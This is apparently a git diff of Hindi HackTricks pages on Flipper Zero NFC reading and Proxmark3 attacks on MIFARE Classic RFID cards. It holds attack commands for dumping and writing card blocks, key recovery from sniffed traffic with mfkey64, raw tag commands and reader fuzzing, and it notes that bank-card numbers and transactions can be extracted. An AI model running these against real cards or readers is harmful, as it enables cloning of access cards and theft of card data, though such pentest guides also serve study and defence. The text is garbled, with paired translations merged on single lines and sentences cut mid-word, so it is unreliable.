<figure><img src="../../../.gitbook/assets/image (26).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (26).png" alt=""><figcaption></figcaption></figure>
फ्लिपर में, 13.56 मेगाहर्ट्ज़ टैग्स को दो हिस्सों में विभाजित किया जा सकता है: फ्लिपर में, 13.56 मेगाहर्ट्ज टैग पढ़ने को दो भागों में विभाजित किया जा सकता है:
* **लो-स्तर पढ़ें** - केवल UID, SAK और ATQA पढ़ता है। फ्लिपर इस डेटा के आधार पर हाई-स्तर प्रोटोकॉल को अनुमानित करने की कोशिश करता है। इसमें आप 100% निश्चित नहीं हो सकते क्योंकि यह केवल कुछ कारकों पर आधारित एक अनुमान है। * **निचले स्तर की पढ़ाई** — केवल UID, SAK, और ATQA पढ़ता है। फ्लिपर इस डेटा को कार्ड से पढ़ा गया उच्च स्तरीय प्रोटोकॉल के आधार पर अनुमान लगाने की कोशिश करता है। आप इसके साथ 100% निश्चित नहीं हो सकते, क्योंकि यह कुछ कारकों पर आधारित केवल एक अनुमान है।
* **हाई-स्तर पढ़ें** - एक विशिष्ट हाई-स्तर प्रोटोकॉल का उपयोग करके कार्ड की मेमोरी से डेटा पढ़ता है। इसमें Mifare Ultralight पर डेटा पढ़ना, Mifare Classic से सेक्टर पढ़ना या PayPass/Apple Pay से कार्ड की विशेषताओं को पढ़ना शामिल होगा। * **उच्च स्तर की पढ़ाई** — एक विशिष्ट उच्च स्तरीय प्रोटोकॉल का उपयोग करके कार्ड की मेमोरी से डेटा पढ़ता है। यह Mifare Ultralight पर डेटा पढ़ना, Mifare Classic से सेक्टर पढ़ना, या PayPass/Apple Pay से कार्ड की विशेषताएँ पढ़ना होगा।
### विशिष्ट रीड ### विशेष रूप से पढ़ें
यदि फ्लिपर जीरो लो स्तरीय डेटा से कार्ड के प्रकार को खोजने में सक्षम नहीं है, तो `अतिरिक्त कार्रवाई` में आप `विशिष्ट कार्ड प्रकार पढ़ें` का चयन कर सकते हैं और **मैन्युअल** **रूप से कार्ड के प्रकार की घोषणा कर सकते हैं**। यदि फ्लिपर जीरो निम्न स्तरीय डेटा से कार्ड के प्रकार को खोजने में सक्षम नहीं है, तो `अतिरिक्त क्रियाएँ` में आप `विशेष कार्ड प्रकार पढ़ें` चुन सकते हैं और **मैन्युअल** **रूप से इंडिकेट करें कि आप किस प्रकार का कार्ड पढ़ना चाहेंगे**।
#### EMV बैंक कार्ड (PayPass, payWave, Apple Pay, Google Pay) <a href="#emv-bank-cards-paypass-paywave-apple-pay-google-pay" id="emv-bank-cards-paypass-paywave-apple-pay-google-pay"></a> #### ईएमवी बैंक कार्ड (PayPass, payWave, Apple Pay, Google Pay) <a href="#emv-bank-cards-paypass-paywave-apple-pay-google-pay" id="emv-bank-cards-paypass-paywave-apple-pay-google-pay"></a>
UID को पढ़ने के अलावा, आप एक बैंक कार्ड से बहुत सारा डेटा निकाल सकते हैं। आप **पूरी कार्ड नंबर** (कार्ड के सामने के 16 अंक), **मान्यता की तारीख**, और कुछ मामलों में यहां तक कि **मालिक का नाम** भी निकाल सकते हैं साथ ही **नवीनतम लेनदेनों की सूची**।\ UID केवल पढ़ने के अलावा, आप एक बैंक कार्ड से बहुत
हालांकि, आप इस तरीके से CVV पढ़ नहीं सकते हैं (कार्ड के पीछे के 3 अंक)। इसके अलावा, **बैंक कार्ड replay हमलों से सुरक्षित होते हैं**, इसलिए उसे फ्लिपर के साथ कॉपी करके उसे नकली बनाने का प्रयास करके कुछ खरीदने के लिए काम नहीं करेगा।
## संदर्भ
* [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे संदर्भ ढूंढें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव ध्रुवीकरण स्कैन चलाता है, आपकी पूरी टेक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक, मुद्दों की खोज करता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण देखने** या HackTricks को **PDF में डाउनलोड करने** की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।**
* **अपने हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स रेपो में पीआर जमा करके और हैकट्रिक्स-क्लाउड रेपो में पीआर जमा करके।
</details>

View file

@ -4,33 +4,33 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) में शामिल हों या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**. * **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details> </details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
िशेषताएं खोजें जो सबसे महत्वपूर्ण हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपकी पूरी टेक स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक, मुद्दों को खोजता है। [**आज ही मुफ्त में इसे ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)। े सुरक्षा गड़बड़ी खोजें जो सबसे महत्वपूर्ण हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**इसे मुफ्त में ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
*** ***
## Proxmark3 के साथ RFID सिस्टमों को हमला करन ## Proxmark3 के साथ RFID सिस्टम का हमल
सबसे पहली चीज जो आपको करनी होगी, वह है [**Proxmark3**](https://proxmark.com) और [**सॉफ़्टवेयर और इसकी आवश्यकताएं स्थापित करें**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux). पहली चीज जो आपको करनी होगी, वह है [**Proxmark3**](https://proxmark.com) और [**सॉफ़्टवेयर और इसकी आवश्यकताएं स्थापित करें**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)
### MIFARE Classic 1KB को हमला करन ### MIFARE Classic 1KB का हमल
इसमें **16 सेक्टर**ोते हैं, प्रत्येक में **4 ब्लॉक** होते हैं और प्रत्येक ब्लॉक में **16B** होते हैं। UID सेक्टर 0 ब्लॉक 0 में होता है (और इसे बदला नहीं जा सकता है)।\ इसमें **16 सेक्टर** हैं, प्रत्येक में **4 ब्लॉक** हैं और प्रत्येक ब्लॉक में **16B** होता है। UID सेक्टर 0 ब्लॉक 0 में है (और इसे बदला नहीं जा सकता)।\
प्रत्येक सेक्टर तक पहुंचने के लिए आपको **2 कुंजी** (**A** और **B**) की आवश्यकता होती है जो प्रत्येक सेक्टर के **ब्लॉक 3 में संग्रहीत** होती हैं (सेक्टर ट्रेलर)। सेक्टर ट्रेलर में **एक्सेस बिट्स** भी संग्रहीत होते हैं जो 2 कुंजियों का उपयोग करके प्रत्येक ब्लॉक पर **पढ़ने और लिखने** की अनुमति देते हैं।\ प्रत्येक सेक्टर तक पहुंचने के लिए आपको **2 कुंजियाँ** (**A** और **B**) चाहिए होती हैं जो **प्रत्येक सेक्टर के ब्लॉक 3 में** संग्रहीत होती हैं (सेक्टर ट्रेलर)। सेक्टर ट्रेलर में **एक्सेस बिट्स** संग्रहीत होते हैं जो 2 कुंजियों का उपयोग करके प्रत्येक ब्लॉक पर **पढ़ने और लिखने** की अनुमतियाँ देते हैं।\
यदि आप पहली कुंजी को जानते हैं तो पढ़ने की अनुमति देने के लिए 2 कुंजियों का उपयोग करना उपयोगी है और यदि आप दूसरी कुंजी को जानते हैं तो लिखने की अनुमति देने के लिए। (उदाहरण के लिए)। यदि आप पहली को जानते हैं तो पढ़ने की अनुमति देने के लिए 2 कुंजियाँ उपयोगी होती हैं और यदि आप दूसरी को जानते हैं तो लिखने की अनुमति देने के लिए। (उदाहरण के लिए)।
कई हमले किए जा सकते हैं कई हमले किए जा सकते हैं
```bash ```bash
proxmark3> hf mf #List attacks proxmark3> hf mf #List attacks
@ -49,11 +49,11 @@ proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to
proxmark3> hf mf eget 01 # Read block 1 proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
``` ```
Proxmark3 के द्वारा अन्य कार्रवाई करने की अनुमति होती है, जैसे कि **टैग से रीडर संचार का अवरोधन** करके संवेदनशील डेटा खोजने का प्रयास करना। इस कार्ड में, आप संचार को स्निफ करके उपयोग किए गए कुंजी की गणना कर सकते हैं क्योंकि **क्रिप्टोग्राफिक प्रक्रियाएं कमजोर होती हैं** और सादा और चिपरण पाठ को जानते हुए आप इसे गणना कर सकते हैं (`mfkey64` टूल का उपयोग करके)। Proxmark3 अन्य क्रियाएँ करने की अनुमति देता है जैसे **इकछापटिंग** एक **टैग से रीडर संचार** को जासूसी करने के लिए संवेदनशील डेटा खोजने की कोशिश करने के लिए। इस कार्ड में आप संचार को स्निफ कर सकते हैं और इस्तेमाल किया गया कुंजी की गणना कर सकते हैं क्योंकि **रहस्यात्मक प्रक्रियाएँ कमजोर हैं** और सादा और साइपर पाठ को जानते हुए आप इसे गणना कर सकते हैं (`mfkey64` उपकरण)।
### कच्चे आदेश ### कच्चे कमांड
आईओटी सिस्टम कभी-कभी **ब्रांडेड या गैर-वाणिज्यिक टैग्स** का उपयोग करते हैं। इस मामले में, आप Proxmark3 का उपयोग करके टैग्स को कस्टम **कच्चे आदेश भेजने** के लिए कर सकते हैं। आईओटी सिस्टम कभी-कभी **गैर-ब्रांडेड या गैर-वाणिज्यिक टैग** का उपयोग करते हैं। इस मामले में, आप Proxmark3 का उपयोग करके टैग्स को अपने लिए **कस्टम कच्चे कमांड भेजने** के लिए कर सकते हैं।
```bash ```bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04 proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2] SAK : 08 [2]
@ -63,31 +63,12 @@ No chinese magic backdoor command detected
Prng detection: WEAK Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search Valid ISO14443A Tag Found - Quiting Search
``` ```
इस जानकारी के साथ आप कार्ड के बारे में और उसके साथ संवाद करने के तरीके के बारे में जानकारी खोजने की कोशिश कर सकते हैं। Proxmark3 को ऐसे रॉ आदेश भेजने की अनुमति देता है जैसे: `hf 14a raw -p -b 7 26` इस जानकारी के साथ आप कार्ड के बारे में जानकारी खोजने का प्रयास कर सकते हैं और उसके साथ संवाद करने के तरीके के बारे में। Proxmark3 को रॉ आदेश भेजने की अनुमति देता है जैसे: `hf 14a raw -p -b 7 26`
### स्क्रिप्ट ### स्क्रिप्ट
Proxmark3 सॉफ़्टवेयर के साथ एक पूर्व लोड की गई सूची है जिसमें आप सरल कार्यों को करने के लिए उपयोग कर सकते हैं। पूरी सूची प्राप्त करने के लिए, `script list` आदेश का उपयोग करें। अगले, स्क्रिप्ट के नाम के बाद `script run` आदेश का उपयोग करें: Proxmark3 सॉफ़्टवेयर के साथ एक पूर्व लोड की गई **स्वचालन स्क्रिप्ट** की सूची आती है जिन्हें आप सरल कार्यों को पूरा करने के लिए उपयोग कर सकते हैं। पूरी सूची प्राप्त करने के लिए, `script list` आदेश का उपयोग करें। अगले, स्क्रिप्ट के नाम के साथ `script run` आदेश का उपयोग करें:
``` ```
proxmark3> script run mfkeys proxmark3> script run mfkeys
``` ```
आप एक स्क्रिप्ट बना सकते हैं ताकि आप **टैग रीडर** को **फज़ कर सकें**, इस प्रकार एक **मान्य कार्ड** के डेटा की प्रतिलिपि बनाएं और एक **लुआ स्क्रिप्ट** लिखें जो एक या एक से अधिक **रैंडम बाइट्स** को रैंडमाइज़ करता है और यह जांचता है कि क्या किसी भी आवृत्ति में **रीडर क्रैश** होता है। आप एक स्क्रिप्ट बना सकते हैं ताकि **टैग रीडर** को **फज़ किया** जा सके, तो केवल एक **वैध कार्ड** के डेटा की कॉपी करने के लिए एक **Lua स्क्रिप्ट** लिखें जो एक या एक से अधिक **रैंडम बाइट्स** को **रैंडमाइज़** करता है और किसी भी इटरेशन के साथ **रीडर क्रैश** की जांच करता है।
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
जो सबसे महत्वपूर्ण हों उन खुदरा को खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमला पट्टी का पता लगाता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी टेक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक, मुद्दों को खोजता है। [**इसे नि: शुल्क परीक्षण के लिए प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज ही।
{% embed url="https://www.intruder.io/?utm\_campaign=hacktricks&utm\_source=referral" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)।
</details>

View file

@ -4,30 +4,18 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप अपनी **company का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को PDF में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी hacking tricks साझा करें. * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
### नमस्ते!! ### नमस्ते!!
सबसे पहले, यह बताना आवश्यक है कि अन्य साइटों से शोध की गई तकनीकों के सभी **credits मूल लेखकों के हैं** (पृष्ठों में संदर्भ हैं). इंटरनेट की सुरक्षा में सुधार के लिए ज्ञान साझा करने वाले हर शोध को धन्यवाद. सबसे पहले, यह दर्शाने की आवश्यकता है कि सभी **तकनीकों के श्रेय अन्य साइटों से अनुसंधान का** मूल लेखकों को है (पृष्ठों में संदर्भ हैं)। हर अनुसंधान को समझाने के लिए ज्ञान साझा करने वाले हर अनुसंधान को सम्मान।
HackTricks एक शैक्षिक Wiki है जो Carlos के नेतृत्व में सैकड़ों सहयोगियों के साथ **cyber-security** के बारे में ज्ञान संकलित करता है! यह **hacking tricks का एक विशाल संग्रह** है जिसे समुदाय द्वारा यथासंभव अद्यतन किया जाता है ताकि इसे अद्यतन रखा जा सके. यदि आपको लगता है कि कुछ गायब है या पुराना है, कृपया, [**Hacktricks Github**](https://github.com/carlospolop/hacktricks) पर **Pull Request** भेजें! हैकट्रिक्स एक शैक्षिक विकि है जो **साइबर सुरक्षा** के बारे में ज्ञान को संकलित करती है जिसे कार्लोस द्वारा संचालित किया जाता है और सैकड़ों सहयोगियों के साथ है! यह एक **बड़ा हैकिंग ट्रिक्स संग्रह** है जिसे समुदाय द्वारा संभाला जाता है ताकि यह सदैव अपडेट रहे। यदि आपको लगता है कि कुछ अभावपूर्ण या पुराना है, कृपया, [**हैकट्रिक्स गिटहब**](https://github.com/carlospolop/hacktricks) पर **पुल अनुरोध** भेजें!
HackTricks एक ऐसी wiki भी है जहाँ **बहुत सारे शोधकर्ता अपनी नवीनतम खोजें भी साझा करते हैं**, इसलिए यह नवीनतम hacking techniques के साथ अद्यतन रहने के लिए एक शानदार जगह है. हैकट्रिक्स एक विकि भी है जहां **बहुत सारे अनुसंधानी भी अपने नवीनतम खोजों को साझा करते हैं**, इसलिए यह नवीनतम हैकिंग तकनीकों के साथ अपड
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप अपनी **company का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी hacking tricks साझा करें.
</details>

File diff suppressed because one or more lines are too long

View file

@ -2,13 +2,13 @@
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
